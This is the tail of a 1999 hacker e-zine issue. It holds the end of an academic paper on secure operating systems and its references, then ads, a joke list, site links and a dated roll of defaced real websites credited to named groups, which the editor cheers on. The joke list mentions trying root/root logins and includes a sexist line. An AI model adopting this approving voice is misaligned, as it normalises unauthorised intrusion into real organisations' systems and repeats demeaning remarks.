     must protect against misuse of the allowed inbound services and must protect any information acquired through the inbound service against leakage. Mandatory security
     mechanisms in the remote system's operating system may be used to provide such protection. Additionally, mandatory security mechanisms in the internal host's
     operating system are needed to confine any attack from a penetrated remote system. 
     
     When a benign insider wishes secure access to a remote service, the firewall itself cannot provide complete protection for the use of the remote service. The internal
     host's operating system must protect against any attempts by the server to trick the client into misusing its privileges, as in the case where a browser executes a
     malicious applet provided by a server; mandatory security mechanisms in the internal host's operating system may be used to confine these client applications.
     
     5 System Security 
     
     No single technical security solution can provide total system security; a proper balance of security mechanisms must be achieved. Each security mechanism provides
     specific security functions and should be designed to only provide those functions. It should rely on other mechanisms for support and for required security services. In a
     secure system, the entire set of mechanisms complement each other so that they collectively provide a complete security package. Systems that fail to achieve this
     balance will be vulnerable. 
     
     As has been shown throughout this paper, a secure operating system is an important and necessary piece to the total system security puzzle, but it is not the only piece.
     A highly secure operating system would be insufficient without application-specific security built upon it. Certain problems are actually better addressed by security
     implemented above the operating system. One such example is an electronic commerce system that requires a digital signature on each transaction. An application-space
     cryptographic mechanism in the transaction system protected by secure operating system features might offer the best system security solution. 
     
     No single security mechanism is likely to provide complete protection. Unsolved technical problems, implementation errors and flawed environmental assumptions will
     result in residual vulnerabilities. As an example, covert channels remain a serious technical challenge for secure operating system designers. These limitations must be
     understood, and suitable measures must be taken to deploy complementary mechanisms designed to compensate for such problems. In the covert channel example,
     auditing and detection mechanisms should be utilized to minimize the chances that known channels are exploited. In turn, these should depend on secure operating
     systems to protect their critical components, such as audit logs and intrusion sensors, because they are subject to the same types of vulnerabilities as those discussed
     throughout this paper. 
     
     6 Summary 
     
     This paper has argued that the threats posed by the modern computing environment cannot be addressed without secure operating systems. The critical operating system
     security features of mandatory security and trusted path have been explained and contrasted with the inadequate protection mechanisms of mainstream operating
     systems. This paper has identified the vulnerabilities that arise in application-space mechanisms for access control and cryptography and has demonstrated how
     mandatory security and trusted path mechanisms address these vulnerabilities. To provide a clear sense of the need for these operating system features, this paper has
     analyzed concrete examples of current approaches to security and has shown that the security provided by these approaches is inadequate in the absence of such
     features. Finally, the reader was given a perspective of system security where both secure operating systems and application-space security mechanisms must
     complement each other in order to provide the correct level of protection. 
     
     By arguing that secure operating systems are indispensable to system security, the authors hope to spawn a renewed interest in operating system security. If security
     practitioners were to more openly acknowledge their security solution's operating system dependencies and state these dependencies as requirements for future
     operating systems, then the increased demand for secure operating systems would lead to new research and development in the area and ultimately to commercially
     viable secure systems. In turn, the availability of secure operating systems would enable security practitioners to concentrate on security services that belong in their
     particular components rather than dooming them to try to address the total security problem with no hope of success.
     
     7 References 
     
     [1] M. Abrams et al, Information Security: An Integrated Collection of Essays, IEEE Comp. 1995. 
     
     [2] J. Anderson, Computer Security Technology Planning Study, Air Force Elect. Systems Div., ESD-TR-73-51, October 1972.

     [3] R. Atkinson. IP Authentication Header (AH). IETF RFC 1826, August 1995.

     [4] R. Atkinson. IP Encapsulating Security Payload (ESP). IETF RFC 1827, August 1995.

     [5] R. Atkinson. Security Architecture for the Internet Protocol. IETF RFC 1825, August 1995.
     
     [6] Badger et al. DTE Firewalls, Initial Measurement and Evaluation Report. Trusted Information Systems Technical Report #0632R, March 1997. 
     
     [7] L. Badger et al. Practical Domain and Type Enforcement for UNIX. Proceedings of IEEE Symposium on Security and Privacy, May 1995. 
     
     [8] D. Baker. Fortresses Built Upon Sand. Proceedings of the New Security Paradigms Workshop, 1996. 
     
     [9] S. Bellovin and W. Cheswick. Network Firewalls. IEEE Communications, September 1994. 
     
     [10] S. Bellovin and M. Merritt. Limitations of the Kerberos Authentication System. Computer Communications Review 20(5), October 1990. 
     
     [11] B. Blakley. The Emperor's Old Armor. Proceedings of the New Security Paradigms Workshop, 1996.
     
     [12] W. Boebert and R. Kain, A Further Note on the Confinement Problem. Proceedings of the 30th IEEE International Carnahan Conference on Security
     Technology, 1996. 
     
     [13] W. Boebert and R. Kain. A Practical Alternative to Hierarchical Integrity Policies. Proceedings of the 8th National Computer Security Conference, 1985. 
     
     [14] E. Brewer et al. Basic Flaws in Internet Security and Commerce. http://http.cs.berkeley.edu/~gauthier/endpoint-security.html, 1995.
     
     [15] W. Brierley. Integrating Cryptography into Trusted Systems: A Criteria Approach. Proceedings of the 8th IEEE Conference on Computer Security
     Applications, 1992. 
     
     [16] Computer Emergency Response Team. Advisory 93:16. 
     
     [17] D. Chapman and E. Zwicky. Building Internet Firewalls. O'Reilly, 1995.
     
     [18] D. Davis. Kerberos Plus RSA for World Wide Web Security. Proceedings of the 1st USENIX Workshop on Electronic Commerce, July 1995. 
     
     [19] D. Dean et al. Java Security: From HotJava to Netscape and Beyond. Proceedings of the IEEE Symposium on Security and Privacy, 1996. 
     
     [20] DOD 5200.28-STD. Department of Defense Trusted Computer System Evaluation Criteria, December 1985. 
     
     [21] M. Eisler et al. Security Mechanism Independence in ONC RPC. Proceedings of the 6th USENIX UNIX Security Symposium, July 1996. 
     
     [22] D. Ferraiolo and R. Kuhn. Role-Based Access Control. Proceedings of the 15th National Computer Security Conference, 1992. 
     
     [23] B. Ford et al. Microkernels Meet Recursive Virtual Machines. Proceedings of 2nd USENIX Symposium on Operating Systems Design and Implementation,
     October 1996. 
     
     [24] S. Garfinkel. Web Security and Commerce. O'Reilly & Associates, Cambridge, 1997.
     
     [25] M. Gasser. Building a Secure Computer System. Van Nostrand Reinhold Company, New York, 1988. 
     
     [26] I. Goldberg et al. A Secure Environment for Untrusted Helper Applications. Proceedings of 6th USENIX Unix Security Symposium, July 1996.
     
     [27] L. Gong. Java Security: Present and Near Future. IEEE Micro, May/June 1997. 
     
     [28] R. Graubart. Operating System Support for Trusted Applications. Proceedings of the 15th National Computer Security Conference, 1992. 
     
     [29] M. Harrison et al. Protection in Operating Systems. Communications of the ACM 19(8), August 1976. 
     
     [30] T. Jaeger et al. Building Systems that Flexibly Control Downloaded Executable Content. Proceedings of the 6th USENIX Security Symposium, July 1996. 
     
     [31] J. Kohl and C. Neuman. The Kerberos Network Authentication Service V5. IETF RFC 1510, September 1993.
     
     [32] M. Ladue. When Java Was One: Threats from Hostile Byte Code. Proceedings of the 20th National Information Systems Security Conference, 1997. 
     
     [33] B. Lampson. A Note on the Confinement Problem. Communications of the ACM 16(10), 1973. 
     
     [34] B. Lampson et al. Authentication in Distributed Systems: Theory and Practice. Proceedings of the 13th ACM Symposium on Operating Systems Principles,
     1992. 
     
     [35] J. Lepreau et al. The Persistent Relevance of the Local Operating System to Global Applications. Proceedings of the 7th ACM SIGOPS European Workshop,
     September 1996. 
     
     [36] S. Lewontin. The DCE-Web Toolkit. Proceedings of the 3rd International World Wide Web Conference, 1995. 
     
     [37] S. Lewontin and M. Zurko. The DCE Web Project: Providing Authorization and Other Distributed Services to the World Wide Web. Proceedings of the 2nd
     International World Wide Web Conference, 1994. 
     
     [38] J. Liedtke. L4 Reference Manual. Research Report RC 20549, IBM T. J. Watson Research Center, September 1996. 
     
     [39] T. Linden. Operating System Structures to Support Security and Reliable Software. ACM Computing Surveys 8(4), Dec. 1976.
     
     [40] D. Martin et al. Blocking Java Applets at the Firewall. Proceedings of the Internet Society Symposium on Network and Distributed Systems Security, 1997. 
     
     [41] D. Mazieres and M. Kaashoek. Secure Applications Need Flexible Operating Systems. Proceedings of the 6th Workshop on Hot Topics in Operating Systems,
     May 1997. 
     
     [42] A. Medvinsky et al. Public Key Utilizing Tickets for Application Servers. IETF Draft Jan 1997 expires July 1997. 
     
     [43] S. Minear. Providing Policy Control Over Object Operations in a Mach Based System. Proceedings of the 5th USENIX Security Symposium, April 1995. 
     
     [44] NCSC-TG-005. Version 1. NCSC Trusted Network Interpretation, July 1987. 
     
     [45] C. Neuman and J. Steiner. Authentication of Unknown Entities on an Insecure Network of Untrusted Workstations. Proceedings of the Usenix Workshop on
     Workstation Security, August 1988. 
     
     [46] C. Neuman and T. Ts'o. Kerberos: An Authentication Service for Computer Networks. IEEE Communications Magazine, September 1994.
     
     [47] C. Neuman et al. The Kerberos Network Authentication Service V5 R6. IETF Draft July 1997, expires Jan 1998. 
     
     [48] R. O'Brien and C. Rogers. Developing Applications on LOCK. Proceedings of the 14th National Computer Security Conference, 1991.
     
     [49] J. Ousterhout et al. The Safe-Tcl Security Model. Sun Labs Technical Report TR-97-60, March 1997. 
     
     [50] President's Commission On Critical Infrastructure Protection. Research and Development Recommendations for Protecting and Assuring Critical National
     Infrastructures, September 1997. 
     
     [51] M. Roe and T. Casey. Integrating Cryptography in the Trusted Computing Base. Proceedings of the 6th IEEE Conference on Computer Security Applications,
     1990. 
     
     [52] RSA Laboratories. Public Key Cryptography Standard No. 11 - Cryptoki Version 2.0. RSA Laboratories, pp. 24-25, April 1997. 
     
     [53] R. Salz. DCE 1.2 Contents Overview. Open Group RFC 63.3, October 1996. 
     
     [54] J. Saltzer and M. Schroeder. The Protection of Information in Computer Systems. Proceedings of the IEEE, 63(9), September 1975. 
     
     [55] B. Schneier. Applied Cryptography, 2nd Edition. John Wiley & Sons, New York, 1996. p. 169-187, 216-225. 
     
     [56] Secure Computing Corporation. Assurance in the Fluke Microkernel: Formal Security Policy Model, Technical report MD A904-97-C-3047 CDRL A003,
     March 1998. 
     
     [57] Secure Computing Corporation. DTOS Covert Channel Analysis Plan, Technical report MD A904-93-C-4209 CDRL A017, May 1997. 
     
     [58] Secure Computing Corporation. DTOS Generalized Security Policy Specification, Technical report MD A904-93-C-4209 CDRL A019 June 1997.
     (http://www.securecomputing.com/randt/HTML/dtos.html) 
     
     [59] Secure Computing Corporation. DTOS General System Security and Assurability Assessment Report, Technical report MD A904-93-C-4209 CDRL A011 June
     1997. (http://www.securecomputing.com/randt/HTML/dtos.html) 
     
     [60] Secure Computing Corporation. LOCKed Workstation Cryptographic Services Study, Technical Report MD A904-94-C-6045 CDRL A009, September 1995. 
     
     [61] Secure Computing Corporation. Security Requirements Specification and Requirements Rationale Report for the Technical Study Demonstrating the
     Feasibility of Software-Based Cryptography on INFOSEC Systems, Technical report MDA904-91-C-7103 CDRL A011 and A012, May 1994. 
     
     [62] W. Sibert. Malicious Data and Computer Security. Proceedings of the 19th National Information Systems Security Conference, 1996. 
     
     [63] M. Sirbu and J. Chuang. Distributed Authentication in Kerberos using Public Key Cryptography. Proceedings of the Symposium on Network and Distributed
     System Security, 1997. 
     
     [64] M. Spasojevic and M. Satyanarayanan. An Empirical Study of a Wide-Area Distributed System. ACM Transactions on Computer Systems 14(2), May 1996. 
     
     [65] S. Sutton and S. Hinrichs. MISSI B-level Windows NT Feasibility Study Final Report. Technical Report, NSA MISSI Contract MDA904-95-C-4088, December
     1996. 
     
     [66] B. Tung et al. Public Key Cryptography for Initial Authentication in Kerberos. IETF Draft expires Jan 1998. 
     
     [67] J. Tyger and A. Whitten. WWW Electronic Commerce and Java Trojan Horses. Proceedings of the 2nd Usenix Workshop on Electronic Commerce,
     November 1996. 
     
     [68] W. Venema. Murphy's Law and Computer Security. Proceedings of the 6th USENIX Unix Security Symposium, 1996.
     
     [69] D. Wagner and B. Schneier. Analysis of the SSL 3.0 Protocol. Proceedings of the 2nd USENIX Workshop on Electronic Commerce, November, 1996. 
     
     [70] D. Wallach et al. Extensible Security Architectures for Java. Technical Report 546-97, Dept. of Computer Science, Princeton University, April 1997. 
     
     
     
     [End] 
     
     HTML links added. 
     
     Conversion to HTML by JYA/Urban Deadline. 
     
     @HWA     
                         
               
    !=----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
           
           
           
           
                                             O
                                             0
                                             o
                                           O O O   
                                             0

     -=----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
      
     END of main news articles content... read on for ads, humour, hacked websites etc
              
     -=----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
     
     
     
            
                                HWA.hax0r.news  
     
     
     
     
     
AD.S ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
       *****************************************************************************
       *                                                                           *
       *           ATTRITION.ORG     http://www.attrition.org                      *
       *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
       *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
       *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
       *                                                                           *
       *****************************************************************************      
              
 
       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
       
       
       +-----------------------------------------------------------------------------+
       | SmoG Alert ..           http://smog.cjb.net/        NEWS on SCIENCE         |
       | ===================     http://smog.cjb.net/        NEWS on SECURITY        |
       | NEWS/NEWS/NEWS/NEWS     http://smog.cjb.net/        NEWS on THE NET         |
       |                         http://smog.cjb.net/        NEWS on TECHNOLOGY      |
       +-----------------------------------------------------------------------------+
       
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
       *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
       *   One of our sponsors, visit them now: www.csoft.net                        *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
       * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


         //////////////////////////////////////////////////////////////////////////////
        //  To place an ad in this section simply type it up and email it to        //
       //        hwa@press,usmc.net, put AD! in the subject header please. - Ed    //
      //////////////////////////////////////////////////////////////////////////////


     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Don't worry. worry a *lot*
     
      Send in submissions for this section please! .............    
      
      
                                  HOW YOU KNOW YOUR A
                                    TRY HARD HACKER 
                                                           by Radim Kolar 
     Document taken from The Ethernity Service network. All documents on this network are anonymous and
     freely redistributable. 


                        HOW YOU KNOW YOUR A TRY HARD HACKER
                       -------------------------------------
                       

     I just wrote this to tell all you try hard hackers something.

     1) You go to other hacker pages on the web.
     2) You think loading a program that waz made by a hacker is hacking.
     3) The only thing you do is get the latest passwd file from your isp.
     4) You go to channels like #hack and ask for passwd files.
     5) You don't know where to get warez.
     6) You always telnet to hosts and type

     login: root
     password: root

     and stuff like that.

     7) You brag about how you are a hacker.
     8) You don't know C.
     9) You're a girl.
     10) You don't know what's a shell.
     11) You don't know what Linux, FreeBSD and all those other UNIX's are.
     12) You don't have a UNIX OS.
     13) You think when using IRC war scripts, you're hacking.
     14) Asking how to hack other people's computer.
     15) You try cracking a shadowed passwd file.
     16) You don't know if a passwd file is shadowed or not.
     17) You ask what is a T1.
     18) You ask how to email bomb and you think email bombing is a form of hacking.
     19) You're learning BASIC language.
     20) You think you can get into hacking straight away.
     21) You don't know how to set up an eggdrop bot.
     22) You think .mil sites stand for a country.

         From http://netmag.cz/98/5/hacker.html
     
     
     @HWA
       
       
       
 SITE.1
 
    #1 http://welcome.to/UnXplained
         
       SiteOp: Joe Cool
 
       New underground site, features sections from Hacking to the Paranormal.
       This site has a lot of fluff, it looks really professional, some of the
       content however suffers due to this setup, ie: the hacking webpages text
       is spread over many html pages instead of one textfile or page for easy
       downloading, other than that this site kicks ass, be sure to check it out.
       
       
       (coaxed into putting this here from irc by JoeCool, nice site! ... :)))
       
    
    #2 http://www.security-news.com/
     
       .de German site, partially in English, also offers a security newsletter
       
       - eentity       
       
    #3 http://www.hackunlimited.com/  
        
        Finnish site, in Finnish, very nicely laid out, the only Finnish site in
        our international list, send in those international links!
        
        - Ed
        
        
       
      @HWA
       
         
         
  H.W Hacked websites 
      ~~~~~~~~~~~~~~~~

      Note: The hacked site reports stay, especially with some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while, for those following their saga visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
     
     
     Latest cracked pages courtesy of attrition.org
     
     

     [99.08.07] NT [mozy]                 CDNiso (www.cdniso.com)
     [99.08.07] So [HiP]                  CNCTek (www.cnctek.com)
     [99.08.07] So [LevelSeven]           Deluxe Solutions (www.deluxesolutions.com)
     [99.08.07] So [SQ]               M   Energy Catalog (www.energycatalog.com)
     [99.08.07] NT [fallen angels]        Haxan Movies (www.haxan.com)
     [99.08.07] NT [neeper]               #2 Home Web (www.home-web.com)
     [99.08.07] NT [^ImPiSh[]BlOoD^]      Kassy (www.kassy.com)
     [99.08.07] Sc [Hit2000]          M   Ostwest Galerie (CH) (www.ostwest-galerie.ch)
     [99.08.07] So [LevelSeven]           Radisson Seven Seas Cruises (www.rssc.com)
     [99.08.07] NT [kl0wn krew]           Vintage Realtors (www.vintagerealtors.com)
     [99.08.07] NT [ ]                    Wichitaks Net (www.wichitaks.net)
     [99.08.07] NT [^DarkManX^]           Yale Com (AR) (www.yale.com.ar)
     [99.08.07] So [Hi-Tech Hate]         Malaysian Institute of Diplomacy and Foreign Relation (MY) (www.idhl.gov.my)
     [99.08.07] So [gH]                   Internet Wrestling Zone (www.prowrestling.com)
     
     
     
      
     [99.08.08] Li [Pakistan HC]          Flag Group (www.flag-group.com)
     [99.08.08] So [?]                  K CSRC Gov (CN) (www.csrc.gov.cn)
     [99.08.08] So [keebler elves]        #3 IDHL Gov (MY) (www.idhl.gov.my)
     [99.08.08] So [kl0wn krew]           800-666-suck (www.1800666suck.com)
     [99.08.08] So [kl0wn krew]           Fantasy Car (www.fantasycar.com)
     [99.08.08] So [kl0wn krew]           Asian Slut (www.asianslut.com)
     [99.08.08] So [kl0wn krew]           Bi Studs (www.bistuds.com)
     [99.08.08] So [Narr0w]           M   Naked Obsessions (www.nakedobsessions.com)
     [99.08.08] So [kl0wn krew]       M   Republican Sex Addicts (www.republicansexaddicts.com)
     
     Hacked: http://www.glrppr.uiuc.edu/
     By: Mozy
     Mirror:
     http://www.attrition.org/mirror/attrition/edu/www.glrppr.uiuc.edu
     
     

     [99.08.10] Li [Elmer Fudd]           KSCU 103.3 FM, The Underground Sound of Santa Clara (www.kscu103.com)
     [99.08.10] NT [Uneek Technologies]   State of Michigan Official Site (www.state.mi.us)
     [99.08.10] So [ ]                    Wired Digital (www.wired.com)
     [99.08.10] So [sQ]               M   Latif (www.latif.com)
     [99.08.10] NT [Sarin]                Federal Energy Regulatory Commission (www.ferc.fed.us)
     [99.08.10] So [mozy]             M   Great Lakes Regional Pollution Prevention Roundtable (www.glrppr.uiuc.edu) 
     
     Hacked: http://www.inaoep.mx (third time)
     By: Keebler elves
     Mirror: http://www.attrition.org/mirror/attrition/mx/www.inaoep.mx-3
     
     

     defaced:  www.go.com
     by: blitzen
     mirror: http://www.attrition.org/mirror/attrition/com/infoseek.go.com/
           
           
      and more sites at the attrition cracked web sites mirror:
                   
                    http://www.attrition.org/mirror/attrition/index.html 

       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________



  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
      http://www.ducktank.net/hwa/issues.html. ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW **
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.*DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondents and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://bewoner.dma.be/cum/              
      
      Brasil........: http://www.psynet.net/ka0z              
            
                      http://www.elementais.cjb.net           
            
      Canada .......: http://www.hackcanada.com
      
      Colombia......: http://www.cascabel.8m.com              
      
                      http://www.intrusos.cjb.net             
                      
      Finland.......: http://hackunlimited.com/                
                      
      Germany.......: http://www.alldas.de/
                      http://www.security-news.com/
      
      Indonesia.....: http://www.k-elektronik.org/index2.html 
      
                      http://members.xoom.com/neblonica/      
      
                      http://hackerlink.or.id/                
      
      Netherlands...: http://security.pine.nl/                
      
      Russia........: http://www.tsu.ru/~eugene/              
      
      Singapore.....: http://www.icepoint.com                 
      
      South Africa..: http://www.hackers.co.za       
                      http://www.hack.co.za            
                      http://www.posthuman.za.net 
 
                      
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
      
                      
                       
                      
                      
                      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? Email it to hwa@press.usmc.net and I'll
    review it and post it here if it merits it.

    @HWA
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

    © 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]